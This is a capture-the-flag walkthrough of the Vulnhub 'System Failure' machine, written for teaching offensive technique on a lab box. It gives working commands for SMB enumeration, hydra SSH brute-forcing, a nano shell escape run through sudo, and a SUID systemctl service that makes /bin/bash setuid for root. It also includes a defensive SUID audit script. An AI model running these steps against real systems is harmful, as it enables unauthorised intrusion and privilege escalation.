System Failure Walkthrough – Vulnhub – Writeup

System Failure is a medium machine from Vulnhub by the author 0xJin. It requires a bit of sysadmin knowledge. However, the author of the machine might have unintentionally misconfigured it in a way that lets us skip several steps, which definitely makes the machine easier. Nevertheless, I am going to walk you through the other way and point out the possible unintended misconfigurations.

Link to the machine: https://www.vulnhub.com/entry/system-failure-1,654/


Identify the target

First of all, we have to identify the IP address of the machine.

fping -aqg 10.0.2.0/24

Scan open ports

Then, we have to check the open ports on the target machine.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.52

Here, we can see that SMB, FTP, SSH and HTTP services are available on the target. Also, we don’t have anonymous access to the FTP service. Hence, we can check whether there are any shares in the SMB service that we can access anonymously.

SMB enumeration

I like to use smbmap because it shows us the permissions on the shares.

smbmap -H 10.0.2.52

There is a share “anonymous” that has read and write access. So, we can log into it.

smbclient -N \\\\10.0.2.52\\anonymous

You can see that there is a file “share”, which I downloaded to my local machine. Upon opening the file, we can see a message from the admin.

cat share

It says that the user has left his login credentials for the FTP server. At the end of the message, we can see a hash, which we can crack using https://crackstation.net.

The hash is an NTLM hash and CrackStation cracked it successfully. However, we still don’t know the username. We could guess that the username is admin, but to be sure, we can enumerate SMB further.

enum4linux -a 10.0.2.52 | tee smb.log

There are four users on the machine, one of which is admin. So, using these credentials, I could log into the FTP server.

lftp -u admin,__password__ 10.0.2.52

Now, at this point, I am going to explain what might be unintentional here. The author has used the same password for the user admin for the SSH service. So, you can log in as the user admin and explore the /var/www/html directory for further enumeration. Similarly, the user admin has access to the files of the whole machine through the FTP client. So, even if the user didn’t have access to the SSH service, he would still see the required files. This surely simplifies what I am going to show you further.

ssh access
FTP access

Anyway, I am going to look at the content of the home directory first. Only the “Syst3m” directory is not empty. It contains a text file with some messages and some files inside the directory “F4luR3”. So, I downloaded the files as follows.

I had created a directory “failures” on my local machine and changed my local directory to it with ‘lcd’. Upon looking at the files, they all looked similar with very few differences. Hence, I combined all these files into a single file.

cat failures/* > combined.txt
more combined.txt

Since most of the words are repeated, we can extract the unique words.

grep -o -E '\w+' combined.txt | sort -u -f 

Upon searching through the output, we get an encoded message.

This doesn’t have “/” or “=” characters but has lowercase, uppercase and numbers. So, we can guess that this is base62. However, we can check the candidates one by one in the CyberChef online tool. Anyway, it gave me a path.
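The steps above (combine the files, keep the unique words, spot the alphanumeric blob, decode it as base62) as an added Python example; this is not code from the walkthrough. It assumes CyberChef's default base62 alphabet (0-9, A-Z, a-z, big-endian integer), and the sample text and its token are constructed, not the machine's real files.

```python
import re
import string
from collections import Counter

# Alphabet assumed to match CyberChef's default "From Base62" (0-9, A-Z, a-z).
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase

def base62_decode(token: str) -> bytes:
    """Read token as a big-endian base62 integer and return its bytes."""
    value = 0
    for ch in token:
        value = value * 62 + ALPHABET.index(ch)  # ValueError on non-base62 chars
    return value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")

def candidate_tokens(text: str, min_len: int = 6) -> list:
    """Like grep -o -E '\\w+' | sort -u -f, then keep words that occur only once,
    use just [0-9A-Za-z] and mix digits with both letter cases (a base62 look)."""
    words = re.findall(r"\w+", text)
    counts = Counter(w.lower() for w in words)
    out, seen = [], set()
    for w in words:
        if w.lower() in seen:
            continue
        seen.add(w.lower())
        if (counts[w.lower()] == 1 and len(w) >= min_len and w.isalnum()
                and any(c.isdigit() for c in w) and any(c.isupper() for c in w)
                and any(c.islower() for c in w)):
            out.append(w)
    return out

def decode_candidates(text: str) -> dict:
    """Map each candidate token to its decoding when that is printable ASCII."""
    found = {}
    for tok in candidate_tokens(text):
        try:
            decoded = base62_decode(tok).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            found[tok] = decoded
    return found

# Constructed stand-in for combined.txt: repeated notices hiding one odd token.
SAMPLE = "\n".join(["SYSTEM FAILURE on node 7, retrying subsystem checks"] * 6
                   + ["SYSTEM FAILURE on node 7, token 3a7dEJk logged"])

if __name__ == "__main__":
    for tok, path in decode_candidates(SAMPLE).items():
        print(f"{tok} -> {path}")  # 3a7dEJk -> /a4/x (constructed sample)
```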

HTTP enumeration

The main page doesn’t have much information.

When I used the previously found path on this page, it gave me a 404 error. Hence, I had to do some fuzzing.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.2.52/FUZZ -e .html,.php,.txt,.bak -of html -o dir.html

This gave us a path “area4”. When I appended the decoded path to it, I got a valid page.

However, if you had come in through SSH, you would already have access to these files and wouldn’t have to do all of these steps. That’s why I think those were unintentional misconfigurations.

Moving further, there is a note and a wordlist at that path.

The note says that not everything goes the right way. I tried brute-forcing the normal way and it didn’t give me any password. So, I used the additional options: -e nsr also tries an empty password, the username itself and the reversed username, and -u loops over users before passwords. Since I had already found the users from the SMB enumeration, I copied them into a new file “users”.

hydra -L users -P useful.txt 10.0.2.52 ssh -t 4 -V -u -e nsr

And that gave me the password of the user valex.

ssh valex@10.0.2.52
ls -al
cat user.txt

Finally, we can get the user flag in the home directory.

Escalate to jin

When we look at the sudo permissions of the user valex, we can see that he can execute a binary pico as the user jin.

sudo -l

The application was nothing but a copy of nano, and nano allows executing commands as well.

Reference: https://gtfobins.github.io/gtfobins/nano/

sudo -u jin pico
^R^X
reset; bash 1>&0 2>&0

And, we got the shell.

reset

In the home directory of the user jin, we got our second flag.

cd
ls -al
cat user2.txt

The user has left a message on the file secret.txt.

cat secret.txt 
Reminder: I had left something in /opt/system

This is a rabbit hole.

Then, I checked the SUID binaries as the user jin.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

We have systemctl as a SUID binary. Therefore, we can create a service that gives us root access. You could spawn a reverse shell; however, I am going to give the bash binary the setuid bit instead.

TF=$(mktemp).service

echo '[Service]
Type=oneshot
ExecStart=chmod +s /bin/bash
[Install]
WantedBy=multi-user.target' > $TF

systemctl link $TF
systemctl enable --now $TF

The execution is successful, and now that the bash binary is SUID, I can easily get root access.

bash -p
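From the defender's side, the find command above is the audit that would have caught this box's misconfiguration before it shipped. Here is an added Python version (not the walkthrough's code) that walks the filesystem the same way and tags setuid-root binaries whose names are known to run arbitrary commands; KNOWN_RISKY is an assumed list drawn from GTFOBins' SUID entries, and SAMPLE_ENTRIES are constructed stand-ins for a real walk.

```python
import os
import stat
from typing import Iterable, Iterator, Tuple

# Assumed list of names whose setuid-root copies can run arbitrary commands
# (taken from GTFOBins' SUID entries; extend it for your environment).
KNOWN_RISKY = {"systemctl", "bash", "find", "vim", "nano", "python", "python3", "perl", "env"}

def walk_modes(root: str) -> Iterator[Tuple[str, int, int]]:
    """Yield (path, st_mode, st_uid) for regular files under root, like find -type f."""
    for dirpath, _, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode, st.st_uid

def audit_suid(entries: Iterable[Tuple[str, int, int]]) -> list:
    """Mirror find / -perm -4000 -type f and tag each hit: setuid-root binaries
    whose name is known to spawn commands are flagged for removal of the bit."""
    findings = []
    for path, mode, uid in entries:
        if not mode & stat.S_ISUID:
            continue
        if uid == 0 and os.path.basename(path) in KNOWN_RISKY:
            findings.append((path, "setuid-root and can run commands: remove the bit"))
        else:
            findings.append((path, "setuid: confirm it belongs to an installed package"))
    return findings

# Constructed entries standing in for a real walk (modes as lstat reports them).
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),     # legitimate setuid-root
    ("/usr/bin/systemctl", 0o104755, 0),  # the misconfiguration the walkthrough abused
    ("/usr/bin/cat", 0o100755, 0),        # not setuid, must not be reported
    ("/home/jin/pico", 0o104755, 1001),   # setuid but not root-owned
]

if __name__ == "__main__":
    for path, reason in audit_suid(walk_modes("/")):
        print(f"{path}: {reason}")
```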

Next, I captured the flag.

cat root.txt

The user suggests that one has to get access to jin first. Since I already have access to jin, this is valid for me. Anyway, the user has put a different flag in the same directory.
